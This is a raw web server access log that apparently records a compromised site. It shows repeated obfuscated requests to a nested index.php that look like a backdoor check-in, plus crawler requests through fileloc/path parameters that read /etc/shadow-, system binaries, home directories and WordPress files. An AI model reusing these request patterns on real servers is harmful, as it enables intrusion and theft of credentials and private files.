51.79.186.0 - - [19/May/2026:14:13:38 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303031382p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363431382q6464373732616637663937653630383537316132393339356634613637636537222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:15:43 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-block-parser-frame.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 3169 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:15:46 +0100] "GET /?path=%2Fhome%2Favoragems HTTP/2" 200 2630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:15:49 +0100] "GET /?path=%2Fhome%2Fzentrohq HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:15:52 +0100] "GET /?path=%2F%2Fhome%2Fshowgola HTTP/2" 200 2628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:15:55 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Ftranslatepress-multilingual HTTP/2" 200 3315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:14:00 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303034302p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363434302q3965393135613133663439356634333663343134326162363838653461326135222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:16:03 +0100] "GET /?fileloc=%2F%2Fsbin%2Fgrpunconv&path=%2F%2Fsbin HTTP/2" 200 19344 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:16:06 +0100] "GET /?fileloc=%2F%2Fsbin%2Fdnssec-keyfromlabel&path=%2F%2Fsbin HTTP/2" 200 15482 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:16:09 +0100] "GET /?fileloc=%2F%2Fetc%2Fshadow-&path=%2F%2Fetc HTTP/2" 200 2566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:16:12 +0100] "GET /?fileloc=%2F%2Fsbin%2Fkexec&path=%2F%2Fsbin HTTP/2" 200 65728 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:16:15 +0100] "GET /?fileloc=%2F%2Fsbin%2Fwhmapi1&path=%2F%2Fsbin HTTP/2" 200 522607 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:16:18 +0100] "GET /?fileloc=%2F%2Fsbin%2Frsyslogd&path=%2F%2Fsbin HTTP/2" 200 309341 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:16:21 +0100] "GET /?fileloc=%2F%2Fetc%2Fmtab&path=%2F%2Fetc HTTP/2" 200 5503 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:16:24 +0100] "GET /?fileloc=%2F%2Fsbin%2Fsfdisk&path=%2F%2Fsbin HTTP/2" 200 38900 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:14:23 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303036332p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363436332q6438613065303234396332306233356364373761383863623135666162636564222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:16:28 +0100] "GET /?fileloc=%2F%2Fsbin%2Fgroupdel&path=%2F%2Fsbin HTTP/2" 200 23512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:16:31 +0100] "GET /?fileloc=%2F%2Fsbin%2Fexim_lock&path=%2F%2Fsbin HTTP/2" 200 9251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.97 - - [19/May/2026:14:16:32 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-term-query.php?view/item/031269905892 HTTP/1.1" 200 27398 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:14:16:34 +0100] "GET /?fileloc=%2F%2Fetc%2Fmailips&path=%2F%2Fetc HTTP/2" 200 2565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:16:37 +0100] "GET /?fileloc=%2F%2Fsbin%2Flogrotate&path=%2F%2Fsbin HTTP/2" 200 37543 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:16:40 +0100] "GET /?path=%2F%2Fhome%2Fnammozhl HTTP/2" 200 2628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:16:43 +0100] "GET /?fileloc=%2F%2Fetc%2Fpool.conf&path=%2F%2Fetc HTTP/2" 200 2672 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:14:45 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303038352p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363438352q3634303935336636623637653538336133306138316239373039646463646365222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:16:46 +0100] "GET /?path=%2F%2Fhome%2Fedudeptncgov HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:16:49 +0100] "GET /?path=%2F%2Fhome%2Fgulfshin HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.160 - - [19/May/2026:14:16:52 +0100] "GET /view/item/17764785934 HTTP/1.1" 200 26318 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:14:16:54 +0100] "GET /?fileloc=%2F%2Fetc%2Fmachine-id&path=%2F%2Fetc HTTP/2" 200 2594 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:16:57 +0100] "GET /?fileloc=%2F%2Fsbin%2Fudevadm&path=%2F%2Fsbin HTTP/2" 200 173996 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:17:00 +0100] "GET /?fileloc=%2F%2Fsbin%2Fnamed-compilezone&path=%2F%2Fsbin HTTP/2" 200 13416 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:17:03 +0100] "GET /?fileloc=%2F%2Fetc%2Fhostname&path=%2F%2Fetc HTTP/2" 200 2569 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:17:06 +0100] "GET /?path=%2F%2Fhome%2Famrajhes HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:15:07 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303130372p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363530372q6137376232303332393065626362643139336134363763333631383332373837222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:17:09 +0100] "GET /?fileloc=%2F%2Fsbin%2Fdmsetup&path=%2F%2Fsbin HTTP/2" 200 53713 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:17:12 +0100] "GET /?fileloc=%2F%2Fsbin%2Fanacron&path=%2F%2Fsbin HTTP/2" 200 17147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.174 - - [19/May/2026:14:17:12 +0100] "GET /view/item/03703958151 HTTP/1.1" 200 27268 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:14:17:18 +0100] "GET /?fileloc=%2F%2Fsbin%2Fe2fsck&path=%2F%2Fsbin HTTP/2" 200 142779 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:17:21 +0100] "GET /?fileloc=%2F%2Fetc%2Fhosts&path=%2F%2Fetc HTTP/2" 200 2646 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:17:23 +0100] "GET /?fileloc=%2F%2Fsbin%2Fnsec3hash&path=%2F%2Fsbin HTTP/2" 200 7014 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:17:27 +0100] "GET /?fileloc=%2F%2Fsbin%2Fe4defrag&path=%2F%2Fsbin HTTP/2" 200 13770 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:17:30 +0100] "GET /?fileloc=%2F%2Fsbin%2Fluserdel&path=%2F%2Fsbin HTTP/2" 200 7135 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:15:31 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303133312p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363533312q6662343465353862313863353964636239636335326132346165633230666461222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:17:33 +0100] "GET /?fileloc=%2F%2Fsbin%2Faddpart&path=%2F%2Fsbin HTTP/2" 200 6619 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:17:36 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fcontact-form-7 HTTP/2" 200 3409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:15:53 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303135332p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363535332q3738626332363736666465333064303238653430343737353037663633373235222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
66.249.70.96 - - [19/May/2026:14:17:53 +0100] "GET /view/item/17819881115 HTTP/1.1" 200 27243 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:14:17:56 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2F.htaccess&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins HTTP/2" 200 2711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:17:58 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2F.htaccess&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie HTTP/2" 200 2715 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:18:01 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Findex.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins HTTP/2" 200 2636 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:18:04 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fhello.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins HTTP/2" 200 3870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:18:07 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fautoloader.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie HTTP/2" 200 4452 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.96 - - [19/May/2026:14:18:14 +0100] "GET /collect/12417439697 HTTP/1.1" 200 26729 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.186.0 - - [19/May/2026:14:16:15 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303137352p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363537352q3866663633303235386137303631616264393836623534306432306561653638222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:18:21 +0100] "GET /?fileloc=%2F%2Fsbin%2Frtmon&path=%2F%2Fsbin HTTP/2" 200 46621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:18:24 +0100] "GET /?path=%2F%2Fhome%2Ffortisi1 HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:18:27 +0100] "GET /?fileloc=%2F%2Fsbin%2Fifconfig&path=%2F%2Fsbin HTTP/2" 200 31558 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:18:30 +0100] "GET /?fileloc=%2F%2Fsbin%2Fdnssec-dsfromkey&path=%2F%2Fsbin HTTP/2" 200 14384 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:18:33 +0100] "GET /?fileloc=%2F%2Fsbin%2Fgenhostid&path=%2F%2Fsbin HTTP/2" 200 5780 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.174 - - [19/May/2026:14:18:35 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-term-query.php?view/item/033504345861 HTTP/1.1" 200 27378 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:14:18:36 +0100] "GET /?fileloc=%2F%2Fsbin%2Fblkid&path=%2F%2Fsbin HTTP/2" 200 20783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:16:37 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303139372p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363539372q3337336631343339306464393265656438613936303335333432306439653063222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:18:39 +0100] "GET /?fileloc=%2F%2Fetc%2Fuserdatadomains&path=%2F%2Fetc HTTP/2" 200 2569 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:18:50 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fwp-rocket HTTP/2" 200 3598 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:18:52 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Foptimole-wp HTTP/2" 200 3318 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:18:55 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fcustom-post-type-ui HTTP/2" 200 3339 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:14:18:56 +0100] "GET /view/item/171354401218 HTTP/1.1" 200 28295 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:14:18:58 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Ftablepress HTTP/2" 200 3515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:16:59 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303231392p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363631392q3031373165326437396566316338633639373365373265623839313132623033222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:19:01 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fstops-core-theme-and-plugin-updates HTTP/2" 200 3537 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:19:04 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc HTTP/2" 200 4168 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:19:07 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fupdraftplus HTTP/2" 200 3855 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:19:10 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fcodevz-plus HTTP/2" 200 3293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:19:15 +0100] "GET /?fileloc=%2F%2Fsbin%2Fexigrep&path=%2F%2Fsbin HTTP/2" 200 7489 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:19:17 +0100] "GET /?fileloc=%2F%2Fsbin%2Fvalidatetrans&path=%2F%2Fsbin HTTP/2" 200 5803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:19:20 +0100] "GET /?fileloc=%2F%2Fetc%2Fsysctl.conf&path=%2F%2Fetc HTTP/2" 200 2761 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:17:21 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303234312p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363634312q3261646165343665643234303731383932643866656138653732303961646666222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:19:23 +0100] "GET /?fileloc=%2F%2Fsbin%2Fsetenforce&path=%2F%2Fsbin HTTP/2" 200 5803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:19:26 +0100] "GET /?path=%2Fhome%2Fjsacsril HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:19:29 +0100] "GET /?path=%2F%2Fhome%2Fmodernas HTTP/2" 200 2630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:19:32 +0100] "GET /?path=%2Fhome%2Fseatransinternat HTTP/2" 200 2632 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:19:38 +0100] "GET /?path=%2F%2Fhome2%2Fcoopdeptncgov HTTP/2" 200 2630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:19:40 +0100] "GET /?fileloc=%2F%2Fsbin%2Fauditd&path=%2F%2Fsbin HTTP/2" 200 52677 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:19:43 +0100] "GET /?fileloc=%2F%2Fsbin%2Fselabel_partial_match&path=%2F%2Fsbin HTTP/2" 200 6267 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
